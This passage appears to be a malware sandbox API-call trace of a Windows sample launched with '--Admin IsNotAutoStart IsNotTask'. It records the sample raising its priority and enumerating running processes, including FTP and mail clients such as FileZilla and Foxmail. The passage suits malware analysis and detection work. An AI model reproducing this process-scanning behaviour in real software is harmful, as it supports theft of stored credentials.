lpBuffer=0x18b638*, lpdwNumberOfBytesRead=0x18de38*=0x1d1) returned 1 [0072.878] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0072.880] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0072.880] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x65dbe0 [0072.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1e0) returned 0x32e3860 [0072.906] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32e3860 | out: hHeap=0x630000) returned 1 [0072.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dbe0 | out: hHeap=0x630000) returned 1 [0072.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6454d0 | out: hHeap=0x630000) returned 1 [0072.914] GetCurrentProcess () returned 0xffffffff [0072.915] GetLastError () returned 0x2 [0072.915] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0072.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x683970 [0072.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8ec) returned 0x32d8c38 [0072.939] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x683f90 [0072.939] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x683f90, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe")) returned 0x50 [0072.939] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0072.947] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x32d9530 [0072.947] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Admin IsNotAutoStart IsNotTask" [0072.947] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18df18 | out: pNumArgs=0x18df18) returned 0x32e66f8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0072.948] lstrcpyW (in: lpString1=0x18eba8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0072.948] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0072.948] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0072.957] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Admin IsNotAutoStart IsNotTask" [0072.957] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18deb4 | out: pNumArgs=0x18deb4) returned 0x32e66f8*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0072.957] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned="243E.TMP.EXE.DEL105265203.DEL105731312.exe" [0072.957] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0072.958] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcesses") returned 0x0 [0072.958] GetProcAddress (hModule=0x76e10000, lpProcName="EnumProcessModules") returned 0x0 [0072.959] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleBaseNameW") returned 0x0 [0072.959] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x74fe0000 [0073.001] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcesses") returned 0x74fe1544 [0073.002] GetProcAddress (hModule=0x74fe0000, lpProcName="EnumProcessModules") returned 0x74fe1408 [0073.002] GetProcAddress (hModule=0x74fe0000, lpProcName="GetModuleBaseNameW") returned 0x74fe152c [0073.002] EnumProcesses (in: lpidProcess=0x1836b0, cb=0xa000, lpcbNeeded=0x18dec0 | out: lpidProcess=0x1836b0, lpcbNeeded=0x18dec0) returned 1 [0073.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0073.010] CloseHandle (hObject=0x0) returned 0 [0073.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0073.010] CloseHandle (hObject=0x0) returned 0 [0073.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0073.010] CloseHandle (hObject=0x0) returned 0 [0073.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0073.010] CloseHandle (hObject=0x0) returned 0 [0073.010] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0073.010] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x250) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0073.011] CloseHandle (hObject=0x0) returned 0 [0073.011] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x338) returned 0x0 [0073.012] CloseHandle (hObject=0x0) returned 0 [0073.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x370) returned 0x0 [0073.012] CloseHandle (hObject=0x0) returned 0 [0073.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3ac) returned 0x0 [0073.012] CloseHandle (hObject=0x0) returned 0 [0073.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0073.012] CloseHandle (hObject=0x0) returned 0 [0073.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0073.012] CloseHandle (hObject=0x0) returned 0 [0073.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x434) returned 0x5a0 [0073.012] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0073.012] CloseHandle (hObject=0x5a0) returned 1 [0073.012] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x444) returned 0x5a0 [0073.012] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0073.012] CloseHandle (hObject=0x5a0) returned 1 [0073.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x0 [0073.013] CloseHandle (hObject=0x0) returned 0 [0073.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4a8) returned 0x5a0 [0073.013] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0073.013] CloseHandle (hObject=0x5a0) returned 1 [0073.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4c4) returned 0x0 [0073.013] CloseHandle (hObject=0x0) returned 0 [0073.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x530) returned 0x5a0 [0073.013] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 0 [0073.013] CloseHandle (hObject=0x5a0) returned 1 [0073.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x720) returned 0x0 [0073.013] CloseHandle (hObject=0x0) returned 0 [0073.013] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5cc) returned 0x0 [0073.014] CloseHandle (hObject=0x0) returned 0 [0073.014] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x674) returned 0x0 [0073.014] CloseHandle (hObject=0x0) returned 0 [0073.014] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x738) returned 0x0 [0073.014] CloseHandle (hObject=0x0) returned 0 [0073.014] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0x5a0 [0073.014] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.015] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x260000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="transactions-naturals.exe") returned 0x19 [0073.016] CloseHandle (hObject=0x5a0) returned 1 [0073.016] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5a0 [0073.016] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.017] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1360000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="camera_intervals_organizational.exe") returned 0x23 [0073.018] CloseHandle (hObject=0x5a0) returned 1 [0073.018] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a4) returned 0x5a0 [0073.018] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.019] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xa0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="adrian defence serbia.exe") returned 0x19 [0073.019] CloseHandle (hObject=0x5a0) returned 1 [0073.019] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x240) returned 0x5a0 [0073.019] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.021] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xbf0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="nbc promising ni.exe") returned 0x14 [0073.021] CloseHandle (hObject=0x5a0) returned 1 [0073.021] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x180) returned 0x5a0 [0073.021] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.023] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1370000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="immigration_stem.exe") returned 0x14 [0073.023] CloseHandle (hObject=0x5a0) returned 1 [0073.023] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x220) returned 0x5a0 [0073.023] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.024] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xf20000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="clicks-yield.exe") returned 0x10 [0073.025] CloseHandle (hObject=0x5a0) returned 1 [0073.025] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x750) returned 0x5a0 [0073.025] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.026] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xdd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="division.exe") returned 0xc [0073.027] CloseHandle (hObject=0x5a0) returned 1 [0073.027] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x700) returned 0x5a0 [0073.027] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.028] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x9e0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="cet-pass.exe") returned 0xc [0073.028] CloseHandle (hObject=0x5a0) returned 1 [0073.028] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x24c) returned 0x5a0 [0073.028] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.030] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x20000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="casino_bills.exe") returned 0x10 [0073.030] CloseHandle (hObject=0x5a0) returned 1 [0073.030] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x734) returned 0x5a0 [0073.030] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.032] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x12d0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="frame.exe") returned 0x9 [0073.032] CloseHandle (hObject=0x5a0) returned 1 [0073.032] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x34c) returned 0x5a0 [0073.032] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.034] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x880000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="framework.exe") returned 0xd [0073.034] CloseHandle (hObject=0x5a0) returned 1 [0073.034] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x678) returned 0x5a0 [0073.034] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.035] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x830000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="comments.exe") returned 0xc [0073.036] CloseHandle (hObject=0x5a0) returned 1 [0073.036] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x694) returned 0x5a0 [0073.036] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.037] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xce0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="zum.exe") returned 0x7 [0073.037] CloseHandle (hObject=0x5a0) returned 1 [0073.037] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x324) returned 0x5a0 [0073.038] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.039] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x940000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="gore.exe") returned 0x8 [0073.039] CloseHandle (hObject=0x5a0) returned 1 [0073.039] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x5a0 [0073.039] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.041] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="analog.exe") returned 0xa [0073.041] CloseHandle (hObject=0x5a0) returned 1 [0073.041] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x814) returned 0x5a0 [0073.041] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.042] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x10d0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="null.exe") returned 0x8 [0073.043] CloseHandle (hObject=0x5a0) returned 1 [0073.043] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x824) returned 0x5a0 [0073.043] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.044] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x8f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="other.exe") returned 0x9 [0073.045] CloseHandle (hObject=0x5a0) returned 1 [0073.045] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x834) returned 0x5a0 [0073.045] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.046] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xc0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="imagingboost.exe") returned 0x10 [0073.046] CloseHandle (hObject=0x5a0) returned 1 [0073.046] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x5a0 [0073.047] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.048] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1220000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="cups.exe") returned 0x8 [0073.048] CloseHandle (hObject=0x5a0) returned 1 [0073.048] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5a0 [0073.048] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.050] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xfe0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0073.050] CloseHandle (hObject=0x5a0) returned 1 [0073.050] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x878) returned 0x5a0 [0073.050] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.052] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xec0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0073.052] CloseHandle (hObject=0x5a0) returned 1 [0073.052] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x890) returned 0x5a0 [0073.052] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.054] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1080000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0073.054] CloseHandle (hObject=0x5a0) returned 1 [0073.054] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b0) returned 0x5a0 [0073.054] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.055] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xdd0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0073.056] CloseHandle (hObject=0x5a0) returned 1 [0073.056] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8c4) returned 0x5a0 [0073.056] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.057] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x8f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0073.058] CloseHandle (hObject=0x5a0) returned 1 [0073.058] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x5a0 [0073.058] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.059] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x820000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0073.059] CloseHandle (hObject=0x5a0) returned 1 [0073.060] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8e4) returned 0x5a0 [0073.060] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.061] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x360000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0073.061] CloseHandle (hObject=0x5a0) returned 1 [0073.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8f4) returned 0x5a0 [0073.061] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.062] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1240000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0073.063] CloseHandle (hObject=0x5a0) returned 1 [0073.063] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x904) returned 0x5a0 [0073.063] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.064] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x12f0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0073.065] CloseHandle (hObject=0x5a0) returned 1 [0073.065] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x914) returned 0x5a0 [0073.065] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.067] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1110000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0073.067] CloseHandle (hObject=0x5a0) returned 1 [0073.067] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x924) returned 0x5a0 [0073.067] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.068] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0xcf0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0073.069] CloseHandle (hObject=0x5a0) returned 1 [0073.069] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x934) returned 0x5a0 [0073.069] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.070] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x970000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0073.070] CloseHandle (hObject=0x5a0) returned 1 [0073.070] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x944) returned 0x5a0 [0073.070] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.072] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x160000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0073.072] CloseHandle (hObject=0x5a0) returned 1 [0073.072] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x954) returned 0x5a0 [0073.072] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.073] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1090000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0073.074] CloseHandle (hObject=0x5a0) returned 1 [0073.074] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x968) returned 0x5a0 [0073.074] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.075] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x3a0000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0073.076] CloseHandle (hObject=0x5a0) returned 1 [0073.076] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x978) returned 0x5a0 [0073.076] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.077] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x170000, lpBaseName=0x18d6b0, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0073.077] CloseHandle (hObject=0x5a0) returned 1 [0073.077] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x988) returned 0x5a0 [0073.077] EnumProcessModules (in: hProcess=0x5a0, lphModule=0x18decc, cb=0x4, lpcbNeeded=0x18deb0 | out: lphModule=0x18decc, lpcbNeeded=0x18deb0) returned 1 [0073.079] GetModuleBaseNameW (in: hProcess=0x5a0, hModule=0x1010000, lpBaseName=0x18d6b0, nSize=0x400 | out: 